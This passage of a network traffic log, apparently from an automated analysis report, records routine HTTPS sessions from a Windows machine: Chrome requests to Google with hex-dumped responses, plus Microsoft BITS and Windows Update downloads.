2024-09-26 15:55:30 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-09-26 15:55:31 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=89418 Date: Thu, 26 Sep 2024 15:55:31 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.16	49785	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:30 UTC	1461	OUT	POST /gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=promo&rt=hpbas.5245&zx=1727366128120&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:31 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-dpS5iHd7VKgc5bqz7gp8Qg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:31 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.16	49786	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:30 UTC	1733	OUT	GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=lOO0Vd,sy8s,P6sQOc?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:31 UTC	828	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1671 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 08:56:14 GMT Expires: Fri, 26 Sep 2025 08:56:14 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 25157 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:31 UTC	562	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 77 28 22 6c 4f 4f 30 56 64 22 29 3b 0a 5f 2e 59 61 62 3d 6e 65 77 20 5f 2e 4e 64 28 5f 2e 6d 4c 61 29 3b 0a 5f 2e 79 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 76 61 72 20 69 62 62 3b 5f 2e 6a 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 74 68 69 73 2e 4e 45 61 3d 61 3b 74 68 69 73 2e 50 6c 64 3d 62 3b 74 68 69 73 2e 70 6c 62 3d 63 3b 74 68 69 73 2e 4f 72 64 3d 64 3b 74 68 69 73 2e 72 45 64 3d 65 3b 74 68 69 73 2e 6a 63 62 3d 30 3b 74 68 69 73 2e 6f 6c 62 3d 69 62 62 28 74 68 69 73 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.w("lOO0Vd");_.Yab=new _.Nd(_.mLa);_.y();}catch(e){_._DumpException(e)}try{var ibb;_.jbb=function(a,b,c,d,e){this.NEa=a;this.Pld=b;this.plb=c;this.Ord=d;this.rEd=e;this.jcb=0;this.olb=ibb(this
2024-09-26 15:55:31 UTC	1109	IN	Data Raw: 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 50 36 73 51 4f 63 22 29 3b 0a 76 61 72 20 6c 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 7b 7d 3b 5f 2e 46 61 28 61 2e 71 73 62 28 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 62 5b 65 5d 3d 21 30 7d 29 3b 76 61 72 20 63 3d 61 2e 6d 72 62 28 29 2c 64 3d 61 2e 41 72 62 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 6a 62 62 28 61 2e 7a 72 62 28 29 2c 63 2e 6b 61 28 29 2a 31 45 33 2c 61 2e 6d 69 62 28 29 2c 64 2e 6b 61 28 29 2a 31 45 33 2c 62 29 7d 2c 6d 62 62 3d 21 21 28 5f 2e 4b 67 5b 32 39 5d 3e 3e 32 39 26 31 29 3b 76 61 72 20 6e 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 42 6e 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 74 68 Data Ascii: {_._DumpException(e)}try{_.w("P6sQOc");var lbb=function(a){var b={};_.Fa(a.qsb(),function(e){b[e]=!0});var c=a.mrb(),d=a.Arb();return new _.jbb(a.zrb(),c.ka()1E3,a.mib(),d.ka()1E3,b)},mbb=!!(_.Kg[29]>>29&1);var nbb=function(a){_.Bn.call(this,a.Ma);th

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.16	49787	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:31 UTC	1452	OUT	POST /gen_204?atyp=i&ei=64P1ZseiHfKwi-gPg-6IsAw&dt19=2&prm23=0&zx=1727366128125&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:31 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-6cz7s0oskie4uB6RhlPflA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:31 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.16	49784	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:31 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=SBWgPo8m6MLKgX2&MD=VCxfKomC HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-26 15:55:31 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 8372857e-a157-4dbc-8bb4-894ee62c2a10 MS-RequestId: 92e87d62-fe6f-437f-8069-9baec67b934f MS-CV: UbrFsOotCUew5enb.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 26 Sep 2024 15:55:30 GMT Connection: close Content-Length: 24490
2024-09-26 15:55:31 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-09-26 15:55:31 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.16	49788	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:31 UTC	1615	OUT	POST /gen_204?atyp=csi&ei=8YP1Zq3GL5iK9u8P68momQ0&s=async&astyp=hpba&ima=0&imn=0&mem=ujhs.10,tjhs.14,jhsl.2173,dm.8&nv=ne.1,feid.bbb3d774-59be-491a-a995-04abadd6c81b&hp=&rt=ttfb.1024,st.1025,bs.27,aaft.1026,acrt.1026,art.1027&zx=1727366129148&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:31 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-kzYFW1W5il0FEPyz8Sw55g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:31 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.16	49794	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:31 UTC	1448	OUT	GET /logos/2024/popcorn/rc4/google_frame_mask.png HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://www.google.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:31 UTC	690	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 2464 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 25 Sep 2024 19:16:09 GMT Expires: Thu, 25 Sep 2025 19:16:09 GMT Cache-Control: public, max-age=31536000 Last-Modified: Wed, 25 Sep 2024 18:30:00 GMT Content-Type: image/png Age: 74362 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:31 UTC	700	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 1c 00 00 03 c0 08 03 00 00 00 49 ab 50 ae 00 00 00 45 50 4c 54 45 47 70 4c 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b c7 9e 93 17 00 00 00 17 74 52 4e 53 00 10 40 80 af 70 30 bf 9f 60 20 50 8f cf ff df ef f4 f9 fd f3 fa fe 48 96 7b a1 00 00 08 f3 49 44 41 54 78 01 ec ce 03 12 c0 40 10 04 c0 cd cc 19 ff ff 6e 6c 95 c3 2e 1c 96 72 3f 05 a8 48 40 3a 80 66 45 a3 65 30 aa be 95 b5 8e 1e 45 80 af ee aa 4a 33 32 11 9a 24 bb a4 38 35 fd 8e 20 53 75 4d cd 40 5d 3d c6 98 46 c7 1c 6e ef 6c 23 b1 36 2e 14 30 21 33 01 90 53 3f ef 72 c9 de 7d 6e b9 09 03 01 18 Data Ascii: PNGIHDRIPEPLTEGpL&&&&&&&&&&&&&&&&&&&&&&tRNS@p0` PH{IDATx@nl.r?H@:fEe0EJ32$85 SuM@]=Fnl#6.0!3S?r}n
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 45 1c 88 03 a2 cb f7 05 0f a4 88 03 71 20 0e c4 81 38 10 07 e2 00 07 8c 31 3e 47 1c 88 03 71 20 0e c4 81 38 f0 4e 4d 88 03 c4 81 38 10 07 e2 40 1c 88 03 71 20 0e c4 81 38 20 e6 04 bb b2 88 03 71 20 0e c4 81 38 10 07 e2 40 1c 88 03 c4 81 38 10 07 e2 40 1c 88 03 71 20 0e c4 81 38 40 1c dc 35 0e 70 f7 39 e2 40 1c 88 03 71 20 0e c4 81 38 10 07 e2 80 e8 12 ec ad e0 da 27 5c 18 87 38 78 85 71 40 d4 04 ab 15 cc 39 30 21 45 1c 88 83 b7 14 07 c4 39 c1 52 16 43 30 8c cf 11 07 e2 40 1c 88 03 71 20 0e c4 01 e2 40 1c bc a2 38 b0 b7 82 5d 59 88 21 c1 49 30 c4 81 38 10 07 e2 40 1c 88 03 71 20 0e c4 01 e2 40 1c 3c 5e 1c 9f 13 fc e6 40 1c 88 83 d7 13 07 4e 82 41 4c f9 0b 78 69 02 e2 40 1c 88 03 71 20 0e c4 81 38 10 07 e2 00 71 20 0e c4 81 38 10 07 e2 40 1c 88 03 71 20 0e Data Ascii: Eq 81>Gq 8NM8@q 8 q 8@8@q 8@5p9@q 8'\8xq@90!E9RC0@q @8]Y!I08@q @<^@NALxi@q 8q 8@q
2024-09-26 15:55:31 UTC	374	IN	Data Raw: 20 0e c4 81 38 10 07 e2 40 1c 88 03 71 e0 32 1e c8 b6 ff 0f de 78 43 1c 88 03 77 d9 43 4e 05 73 0e c4 81 38 10 07 e2 40 1c 88 03 71 20 0e c4 01 e2 40 1c 88 03 71 20 0e c4 81 38 10 07 e2 40 1c e0 ea 50 dc d4 84 38 10 07 e2 40 1c 88 03 73 0e c4 81 38 10 07 88 03 71 20 0e c4 81 38 10 07 e2 40 1c 88 03 71 80 38 10 07 e2 40 1c 78 a9 09 7b 48 11 07 97 72 8d d7 4d cf 00 ee 78 43 1c 88 03 71 20 0e c4 01 d9 f6 ac 61 08 86 38 10 07 fe 73 60 b5 82 38 10 07 88 03 71 20 0e c4 81 38 10 07 e2 40 1c 88 03 71 40 8e 85 9f dc cf 01 39 f5 df c1 f9 1c 88 03 71 20 0e 10 07 e2 40 1c 88 03 13 52 9c 43 8a 9f 15 c4 81 38 10 07 88 03 71 20 0e c4 81 38 10 07 9e ad 20 0e c4 81 38 20 53 c1 6a 05 71 20 0e c4 81 38 10 07 e2 e0 12 5c e5 54 18 da 3c 3e 21 45 1c 8b c2 d0 36 f3 c2 d0 2a b9 Data Ascii: 8@q2xCwCNs8@q @q 8@P8@s8q 8@q8@x{HrMxCq a8s`8q 8@q@9q @RC8q 8 8 Sjq 8\T<>!E6*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.16	49793	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:31 UTC	1152	OUT	GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=aLUfP?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: 